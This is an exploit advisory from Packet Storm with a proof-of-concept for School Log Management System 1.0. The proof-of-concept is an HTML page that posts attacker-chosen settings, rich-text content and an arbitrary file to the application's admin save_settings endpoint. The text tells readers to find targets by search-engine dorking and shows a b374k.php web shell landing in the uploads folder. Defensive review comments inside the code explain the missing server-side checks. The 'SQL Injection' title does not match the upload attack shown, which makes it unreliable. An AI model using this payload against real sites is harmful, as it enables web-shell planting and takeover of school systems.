
School Log Management System 1.0 SQL Injection / Code Execution

🗓️ 26 Aug 2024 00:00:00 | Reported by: indoushka | Type: packetstorm | 🔗 packetstormsecurity.com | 👁 204 Views

School Log Management System 1.0: WYSIWYG settings management vulnerability. Form data can be injected via the Froala WYSIWYG editor, with a risk of code execution.

Code
`=============================================================================================================================================  
| # Title : School Log Management System 1.0 WYSIWYG Settings Management Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |  
| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/school-log-management-system_1.zip |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking in Google or another search engine.  
  
[+] Part 01 : about-us.php  
  
[+] This payload injects code of your choice into the database via Froala, a WYSIWYG editor (V: 4.2.1).  
  
[+] Line 109 : Send the form data using fetch API (Set your target url)  
  
[+] save payload as poc.html  
  
[+] payload :   
  
  
<!DOCTYPE html>  
<html lang="en">  
  
<head>  
<meta charset="UTF-8">  
<meta name="viewport" content="width=device-width, initial-scale=1.0">  
<title>Settings Management</title>  
<!-- Froala Editor CSS -->  
<link href="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/4.0.1/css/froala_editor.pkgd.min.css" rel="stylesheet">  
<!-- Bootstrap CSS -->  
<link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet">  
<style>  
/* Custom Styles */  
#cimg {  
max-width: 100%;  
height: auto;  
}  
#preloader2 {  
position: fixed;  
top: 0;  
left: 0;  
width: 100%;  
height: 100%;  
background: rgba(0, 0, 0, 0.5);  
display: flex;  
justify-content: center;  
align-items: center;  
z-index: 9999;  
}  
.form-group {  
margin-bottom: 1rem;  
}  
.form-group label {  
display: block;  
margin-bottom: .5rem;  
}  
.form-group input, .form-group textarea {  
width: 100%;  
padding: .5rem;  
box-sizing: border-box;  
}  
</style>  
</head>  
  
<body>  
<div class="container">  
<!-- Settings form: name, email, contact, about (rich text) and img (file) are posted together as multipart/form-data by the submit handler in the script further down. -->
<!-- NOTE(review): every constraint on this form (required, type="email", accept="image/*") is enforced by the browser only. The "Path" line at the end of the advisory shows a .php file under admin/assets/uploads, so the receiving endpoint presumably does not restrict the uploaded file type itself. The fix belongs on the server: allow-list image types, store uploads where they cannot be executed, and sanitize the "about" HTML before storing or rendering it. -->
<form id="manage-settings" method="post" enctype="multipart/form-data">  
<div class="form-group">  
<label for="name"> Name</label>  
<input type="text" id="name" name="name" required>  
</div>  
<div class="form-group">  
<label for="email">Email</label>  
<input type="email" id="email" name="email" required>  
</div>  
<!-- NOTE(review): this form-group is never closed in the listing, so the groups that follow nest inside it. -->
<div class="form-group">  
<label for="contact">Contact</label>  
<input type="tel" id="contact" name="contact" required>  
  
<div class="form-group">  
<label for="about">About Content</label>  
<!-- The .text-jqte class is the selector the script uses to attach the Froala editor to this textarea. -->
<textarea class="text-jqte" id="about" name="about"></textarea>  
</div>  
<div class="form-group">  
<label for="img">Cover Image</label>  
<!-- accept="image/*" only filters the browser's file picker; it is not a server-side check. -->
<input type="file" id="img" name="img" accept="image/*" onchange="displayImg(this, this)">  
<img id="cimg" src="" alt="Selected Image Preview">  
</div>  
<button type="submit" class="btn btn-primary">Save Settings</button>  
</form>  
</div>  
  
  
<div class="modal fade" id="viewer_modal" role='dialog'>  
<div class="modal-dialog modal-md" role="document">  
<div class="modal-content">  
<button type="button" class="btn-close" data-dismiss="modal"><span class="fa fa-times"></span></button>  
<img src="" alt="">  
</div>  
</div>  
</div>  
  
<!-- Third-party libraries, all fetched from public CDNs when the page loads. -->
<!-- NOTE(review): none of these tags carries an integrity/crossorigin attribute, so the browser runs whatever the CDN returns; add Subresource Integrity hashes if this markup is ever reused. -->
<!-- jQuery -->  
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>  
<!-- Froala Editor JS -->  
<!-- NOTE(review): this loads Froala 4.0.1, while the advisory text above names version 4.2.1. -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/4.0.1/js/froala_editor.pkgd.min.js"></script>  
<!-- Bootstrap JS (for modals) -->  
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.bundle.min.js"></script>  
  
<script>  
/**
 * Preview the first file chosen in a file input inside the #cimg image.
 *
 * The file is read locally as a data: URL; nothing is sent to a server here,
 * and no check is made on the file's type or size.
 *
 * @param {HTMLInputElement} input - File input whose selection changed.
 * @param {*} _this - Unused; kept because the inline onchange handler passes it.
 */
function displayImg(input, _this) {
  const chosen = input.files && input.files[0];
  if (!chosen) {
    return;
  }

  const fileReader = new FileReader();
  // The handler is attached before the read starts so the load event is not missed.
  fileReader.onload = (event) => {
    $('#cimg').attr('src', event.target.result);
  };
  fileReader.readAsDataURL(chosen);
}
  
// Once the DOM is ready, attach the Froala rich-text editor to the
// .text-jqte textarea (the "about" field of the settings form).
$(document).ready(() => {
  new FroalaEditor('.text-jqte');
});
  
// Submit handler for #manage-settings: cancels the native form submission and
// posts the fields as one multipart request instead.
$('#manage-settings').submit(function (e) {  
e.preventDefault();  
// Shows the loading overlay. NOTE(review): end_load() is never called in this
// handler, so the overlay stays up on the error path and when resp is not 1.
start_load();  
$.ajax({  
// NOTE(review): the target is the application's admin endpoint, while this page
// is a stand-alone file outside the application. The checks a defender should
// confirm in admin/ajax.php (not shown here) are: an authenticated admin
// session, an anti-CSRF token, and server-side validation of the uploaded file.
url: 'http://127.0.0.1/slms/admin/ajax.php?action=save_settings',  
// FormData built from the form element carries the text fields and the img file.
data: new FormData($(this)[0]),  
cache: false,  
// contentType:false and processData:false leave the FormData untouched so the
// browser sets the multipart boundary itself.
contentType: false,  
processData: false,  
method: 'POST',  
// `type` is jQuery's older alias for `method`; both are set to POST.
type: 'POST',  
error: err => {  
console.log(err);  
},  
success: function (resp) {  
// Loose comparison: matches the number 1 as well as the string "1".
if (resp == 1) {  
alert_toast('Data successfully saved.', 'success');  
// Reload after one second so the toast is visible first.
setTimeout(function () {  
location.reload();  
}, 1000);  
}  
}  
});  
});  
  
/**
 * Show the full-page loading overlay by inserting #preloader2 as the first
 * child of <body>. Each call inserts another overlay element; there is no
 * check for one that already exists.
 */
window.start_load = function () {
  const overlay = $('<div id="preloader2"></div>');
  overlay.prependTo('body');
};
  
/**
 * Hide the loading overlay: fade #preloader2 out quickly, then remove it
 * from the DOM once the fade has finished.
 */
window.end_load = function () {
  const overlay = $('#preloader2');
  const removeFaded = function () {
    // `this` is the element whose fade just completed.
    $(this).remove();
  };
  overlay.fadeOut('fast', removeFaded);
};
  
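/**
 * Show an image or an MP4 video in the #viewer_modal dialog.
 *
 * Any media element already inside the dialog is removed first.
 *
 * @param {string} [$src=''] - URL or path of the media to display.
 */
window.viewer_modal = function ($src = '') {
  start_load();

  // Take the extension from the last path segment, ignoring any query string
  // or fragment. The previous split('.')[1] picked the wrong part for names
  // with more than one dot (for example "a.b.mp4" or a host name with dots).
  const path = String($src).split(/[?#]/)[0];
  const fileName = path.slice(path.lastIndexOf('/') + 1);
  const dotIndex = fileName.lastIndexOf('.');
  const extension = dotIndex === -1 ? '' : fileName.slice(dotIndex + 1).toLowerCase();

  // Set src as an attribute instead of concatenating it into markup, so a
  // quote inside $src cannot break out of the attribute and add new markup.
  const view =
    extension === 'mp4'
      ? $('<video controls autoplay></video>').attr('src', $src)
      : $('<img />').attr('src', $src);

  $('#viewer_modal .modal-content video,#viewer_modal .modal-content img').remove();
  $('#viewer_modal .modal-content').append(view);
  $('#viewer_modal').modal({
    show: true,
    backdrop: 'static',
    keyboard: false,
    focus: true,
  });
  end_load();
};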
  
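/**
 * Load a fragment from $url and show it in the #uni_modal dialog.
 *
 * @param {string} [$title=''] - Title for the dialog, inserted as HTML.
 * @param {string} [$url=''] - URL the dialog body is fetched from.
 * @param {string} [$size=''] - Extra class for .modal-dialog; when empty the
 *   dialog is reset to "modal-dialog modal-md".
 */
window.uni_modal = function ($title = '', $url = '', $size = '') {
  start_load();
  $.ajax({
    url: $url,
    error: (err) => {
      console.log(err);
      alert('An error occurred');
    },
    success: (resp) => {
      if (!resp) {
        return;
      }
      // NOTE(review): both values are inserted as HTML. That is only safe when
      // $title and the response from $url come from a trusted source; escape
      // or sanitize them if either can carry user-supplied content.
      $('#uni_modal .modal-title').html($title);
      $('#uni_modal .modal-body').html(resp);
      if ($size != '') {
        $('#uni_modal .modal-dialog').addClass($size);
      } else {
        $('#uni_modal .modal-dialog').removeAttr('class').addClass('modal-dialog modal-md');
      }
      $('#uni_modal').modal({
        show: true,
        backdrop: 'static',
        keyboard: false,
        focus: true,
      });
    },
    // Runs after success and after error. Previously the overlay was removed
    // only on a non-empty success response, so a failed or empty request left
    // the page covered by the preloader.
    complete: () => {
      end_load();
    },
  });
};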
  
/**
 * Open the #confirm_modal dialog and wire its #confirm button to a call.
 *
 * NOTE(review): the handler is built as JavaScript source text
 * ("func(arg1,arg2)") and stored in the onclick attribute, so $func and every
 * entry of $params are evaluated as code when the button is clicked. Callers
 * must never pass user-controlled values here; $msg is inserted as HTML and
 * needs the same care.
 *
 * @param {string} [$msg=''] - Message shown in the dialog body (HTML).
 * @param {string} [$func=''] - Name of the function to call on confirm.
 * @param {Array} [$params=[]] - Arguments, already formatted as source text.
 */
window._conf = function ($msg = '', $func = '', $params = []) {
  const argumentList = $params.join(',');
  const handlerSource = $func + '(' + argumentList + ')';
  $('#confirm_modal #confirm').attr('onclick', handlerSource);
  $('#confirm_modal .modal-body').html($msg);
  $('#confirm_modal').modal('show');
};
  
/**
 * Show a message in the #alert_toast toast for three seconds.
 *
 * NOTE(review): $msg is inserted as HTML, so it must not contain
 * unescaped user-supplied text.
 *
 * @param {string} [$msg='TEST'] - Message to display (HTML).
 * @param {string} [$bg='success'] - One of success, danger, info, warning;
 *   any other value leaves the toast without a background class.
 */
window.alert_toast = function ($msg = 'TEST', $bg = 'success') {
  const backgroundClasses = {
    success: 'bg-success',
    danger: 'bg-danger',
    info: 'bg-info',
    warning: 'bg-warning',
  };
  const toast = $('#alert_toast');

  // Clear whichever background a previous call left behind.
  toast.removeClass('bg-success bg-danger bg-info bg-warning');

  for (const [tone, className] of Object.entries(backgroundClasses)) {
    // Loose comparison kept on purpose to match the original checks.
    if ($bg == tone) {
      toast.addClass(className);
    }
  }

  $('#alert_toast .toast-body').html($msg);
  toast.toast({ delay: 3000 }).toast('show');
};
</script>  
</body>  
  
</html>  
  
[+] Path : background: url(admin/assets/uploads/1724235960_b374k.php);  
  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================  
`
